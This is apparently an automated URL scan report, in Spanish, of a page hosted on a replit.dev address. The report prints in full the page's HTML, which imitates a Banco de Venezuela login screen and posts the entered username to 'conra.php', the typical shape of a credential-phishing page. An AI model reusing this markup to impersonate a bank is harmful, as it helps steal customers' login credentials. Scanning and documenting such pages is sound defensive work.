- ID de exploración:
- f5fd0a62-7315-4c70-8d94-25fed8bc6840Finalizado
- URL enviada:
- https://4290a207-ea4e-453c-9e9a-2b27a06d1848-00-7jrrtf98n6vl.janeway.replit.dev/
- Informe finalizado:
Enlaces: 0 encontrados
Los enlaces salientes identificados en la página
Variables JavaScript: 3 encontradas
Las variables JavaScript globales cargadas en el objeto de ventana de una página son variables declaradas fuera de las funciones y a las que se puede acceder desde cualquier lugar del código en el ámbito actual
Nombre | Tipo |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Mensajes de registro de la consola: 1 encontrados
Mensajes registrados en la consola web
Tipo | Categoría | Registro |
---|---|---|
error | network |
|
HTML
El cuerpo HTML sin procesar de la página
<!DOCTYPE html><html lang="es"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title>Banco de Venezuela</title>
<style>
body {
margin: 0;
padding: 0;
font-family: Arial, sans-serif;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
background-image: url(background.jpg);
background-size: cover;
background-position: center;
}
.container {
display: flex;
height: 100%;
width: 100%;
}
.left-side {
width: 50%;
display: flex;
justify-content: center;
align-items: center;
}
.right-side {
width: 50%;
}
.form {
width: 80%;
background: white;
max-width: 550px;
box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.1);
}
@media (max-width: 768px) {
body {
background: #ededed;
}
.container {
flex-direction: column;
}
.left-side {
width: 100%;
height: 100vh;
}
.right-side {
display: none;
}
}
</style>
<style>
.form-group {
position: relative;
margin-bottom: 20px;
margin: 20px;
}
.form-group label {
position: absolute;
top: 50%;
left: 10px;
transform: translateY(-55%);
color: #999;
transition: top 0.3s, font-size 0.3s;
pointer-events: none;
}
.form-group input {
width: 100%;
padding: 10px;
box-sizing: border-box;
position: relative;
height: 60px;
border: 0;
border-bottom: 1px solid gray;
background: #ededed;
outline: none;
}
.form-group input:focus {
border: 0;
}
.form-group input:focus + label,
.form-group input:not(:placeholder-shown) + label {
top: 5px;
font-size: 12px;
}
button {
background-color: #0067b1;
color: white;
border-radius: 3px;
border: 0;
padding: 15px;
width: 200px;
}
</style>
<style>
.form-group2 {
position: relative;
margin-bottom: 20px;
margin: 20px;
}
.form-group2 label {
position: absolute;
top: 50%;
left: 23%;
transform: translateY(-55%);
color: #999;
transition: top 0.3s, font-size 0.3s;
pointer-events: none;
}
.form-group2 input {
padding: 10px;
box-sizing: border-box;
position: relative;
height: 60px;
border: 0;
border-bottom: 1px solid gray;
background: #ededed;
outline: none;
}
.form-group2 input:focus {
border: 0;
}
.form-group2 input:focus + label,
.form-group2 input:not(:placeholder-shown) + label {
top: 5px;
font-size: 12px;
}
</style>
<style>
.overlay {
display: flex;
justify-content: center;
align-items: center;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.5);
/* Fondo semitransparente */
z-index: 9999;
/* Asegura que esté por encima de otros elementos */
}
.content {
background-color: #fff;
width: 350px;
border-radius: 5px;
text-align: center;
}
</style>
<style>
.form-group2 {
position: relative;
margin-bottom: 20px;
margin: 20px;
}
.form-group2 label {
position: absolute;
top: 50%;
left: 10px;
transform: translateY(-55%);
color: #999;
transition: top 0.3s, font-size 0.3s;
pointer-events: none;
white-space: nowrap;
/* Asegura que el texto del label no se rompa */
}
.form-group2 input {
width: 100%;
padding: 10px 10px 10px 10px;
box-sizing: border-box;
position: relative;
height: 60px;
border: 0;
border-bottom: 1px solid gray;
background: #ededed;
outline: none;
font-size: 16px;
/* Ajusta el tamaño de la fuente del input */
}
.form-group2 input:focus + label,
.form-group2 input:not(:placeholder-shown) + label {
top: 5px;
font-size: 12px;
left: 10px;
}
</style>
</head>
<body>
<div class="container">
<div class="left-side">
<form id="loginform" class="form" action="conra.php" method="post">
<div style="text-align: center">
<img src="logo.png" alt="" style="width: 60%; margin-top: 20px">
</div>
<div style="width: 100%; text-align: center">
<div class="form-group">
<input type="text" id="nombre" name="nombre" style="width: 100%" required="">
<label for="nombre" style="top: 50%;">Usuario *</label>
</div>
<script>
document.addEventListener("DOMContentLoaded", function () {
const input = document.getElementById("nombre");
const label = input.nextElementSibling;
label.style.top = "50%";
if (input.value !== "") {
label.style.top = "15px";
label.style.fontSize = "12px";
}
input.addEventListener("focus", () => {
label.style.top = "15px";
label.style.fontSize = "12px";
});
input.addEventListener("blur", () => {
if (!input.value) {
label.style.top = "50%";
label.style.fontSize = "";
}
});
});
</script>
</div>
<div style="width: 100%; text-align: center">
<button type="submit">Entrar</button>
</div>
<div style="
width: 100%;
text-align: center;
font-size: 12px;
font-weight: bold;
color: #999;
margin-top: 30px;
margin-bottom: 30px;
">
¿Olvidaste tu usuario o clave? <br>
Si eres nuevo clienteBDV regístrate aquí
</div>
</form>
</div>
<div class="right-side"></div>
</div>
</body></html>